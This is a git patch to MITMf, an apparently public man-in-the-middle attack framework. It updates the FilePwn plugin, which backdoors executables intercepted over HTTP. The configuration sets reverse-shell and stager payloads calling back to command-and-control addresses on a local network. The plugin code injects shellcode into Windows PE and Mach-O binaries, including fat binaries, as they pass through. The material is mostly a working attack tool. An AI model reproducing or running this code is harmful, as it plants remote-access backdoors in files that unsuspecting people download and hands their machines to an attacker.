From 5e9158ce0ad841caaf3be921dda8ed9f9ef26c9e Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 14 Apr 2015 16:16:29 +0200 Subject: [PATCH] Updated FilePwn plugin with latest BDFProxy version Removed exception handling in mitmf.py since I actually want a traceback --- config/mitmf.conf | 15 ++++++++---- libs/bdfactory | 2 +- libs/responder | 2 +- mitmf.py | 30 ++++++++++------------- plugins/FilePwn.py | 60 ++++++++++++++++++++++++++-------------------- 5 files changed, 59 insertions(+), 50 deletions(-) diff --git a/config/mitmf.conf b/config/mitmf.conf index 9339e9e..f1f5b32 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -363,6 +363,7 @@ FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large CompressedFiles = True #True/False + [[[[LinuxIntelx86]]]] SHELL = reverse_shell_tcp # This is the BDF syntax HOST = 192.168.1.168 # The C2 @@ -378,10 +379,12 @@ MSFPAYLOAD = linux/x64/shell_reverse_tcp [[[[WindowsIntelx86]]]] - PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND + PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND + # PATCH_METHOD overwrites PATCH_TYPE with jump + PATCH_METHOD = automatic HOST = 192.168.1.16 - PORT = 4444 - SHELL = reverse_tcp_stager + PORT = 8443 + SHELL = iat_reverse_tcp_stager_threaded SUPPLIED_SHELLCODE = None ZERO_CERT = False PATCH_DLL = True @@ -389,10 +392,12 @@ [[[[WindowsIntelx64]]]] PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND + # PATCH_METHOD overwrites PATCH_TYPE with jump + PATCH_METHOD = automatic HOST = 192.168.1.16 PORT = 8088 - SHELL = reverse_shell_tcp - SUPPLIED_SHELLCODE = Nonepatchpatchpatch + SHELL = iat_reverse_tcp_stager_threaded + SUPPLIED_SHELLCODE = None ZERO_CERT = True PATCH_DLL = False MSFPAYLOAD = windows/x64/shell_reverse_tcp diff --git a/libs/bdfactory b/libs/bdfactory index 9ce83ea..e6af51b 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19 +Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b diff --git a/libs/responder b/libs/responder index e7a69e4..137e8ee 160000 --- a/libs/responder +++ b/libs/responder @@ -1 +1 @@ -Subproject commit e7a69e46c13f77c90300965a0897d13de6437f78 +Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef diff --git a/mitmf.py b/mitmf.py index 42e8391..b2cdb19 100755 --- a/mitmf.py +++ b/mitmf.py @@ -149,26 +149,22 @@ print "[*] MITMf v%s online... initializing plugins" % mitmf_version load = [] for p in plugins: - try: - if vars(args)[p.optname] is True: - print "|_ %s v%s" % (p.name, p.version) - if hasattr(p, 'tree_output') and p.tree_output: - for line in p.tree_output: - print "| |_ %s" % line - p.tree_output.remove(line) + if vars(args)[p.optname] is True: + print "|_ %s v%s" % (p.name, p.version) + if hasattr(p, 'tree_output') and p.tree_output: + for line in p.tree_output: + print "| |_ %s" % line + p.tree_output.remove(line) - if getattr(args, p.optname): - p.initialize(args) - load.append(p) + if getattr(args, p.optname): + p.initialize(args) + load.append(p) - if vars(args)[p.optname] is True: - if hasattr(p, 'tree_output') and p.tree_output: - for line in p.tree_output: - print "| |_ %s" % line - - except Exception: - print "[-] Error loading plugin %s: %s" % (p.name, PrintException()) + if vars(args)[p.optname] is True: + if hasattr(p, 'tree_output') and p.tree_output: + for line in p.tree_output: + print "| |_ %s" % line #Plugins are ready to go, start MITMf if args.disproxy: diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 2d10897..987db4d 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -78,7 +78,7 @@ class FilePwn(Plugin): optname = "filepwn" desc = "Backdoor executables being sent over http using bdfactory" implements = ["handleResponse"] - tree_output = ["BDFProxy v0.2 online"] + tree_output = ["BDFProxy v0.3.2 online"] version = "0.2" has_opts = False @@ -123,8 +123,6 @@ class FilePwn(Plugin): self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] - self.output.append("BDFProxy by midnite_runr online") - def convert_to_Bool(self, aString): if aString.lower() == 'true': return True @@ -167,6 +165,10 @@ class FilePwn(Plugin): elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': cave_jumping = True + # if automatic override + if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': + cave_jumping = True + targetFile = pebin.pebin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx64['SHELL'], @@ -178,6 +180,7 @@ class FilePwn(Plugin): PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), + PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() ) result = targetFile.run_this() @@ -193,6 +196,10 @@ class FilePwn(Plugin): elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': cave_jumping = True + # if automatic override + if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': + cave_jumping = True + targetFile = pebin.pebin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx86['SHELL'], @@ -203,7 +210,8 @@ class FilePwn(Plugin): IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']) + ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), + PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() ) result = targetFile.run_this() @@ -236,7 +244,7 @@ class FilePwn(Plugin): ) result = targetFile.run_this() - elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho + elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() @@ -245,29 +253,29 @@ class FilePwn(Plugin): if targetFile.FAT_FILE is True: if self.FatPriority == 'x86': targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT = os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx86['SHELL'], + HOST=self.MachoIntelx86['HOST'], + PORT=int(self.MachoIntelx86['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) result = targetFile.run_this() elif self.FatPriority == 'x64': targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT = os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) + OUTPUT=os.path.basename(binaryFile), + SHELL=self.MachoIntelx64['SHELL'], + HOST=self.MachoIntelx64['HOST'], + PORT=int(self.MachoIntelx64['PORT']), + SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], + FAT_PRIORITY=self.FatPriority + ) result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': + + elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT = os.path.basename(binaryFile), + OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), @@ -276,9 +284,9 @@ class FilePwn(Plugin): ) result = targetFile.run_this() - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': + elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT = os.path.basename(binaryFile), + OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), @@ -286,7 +294,7 @@ class FilePwn(Plugin): FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() - + self.patched.put(result) return @@ -464,7 +472,7 @@ class FilePwn(Plugin): patchCount = 0 wasPatched = False - + for info in zippyfile.infolist(): print "[*] >>> Next file in zipfile:", info.filename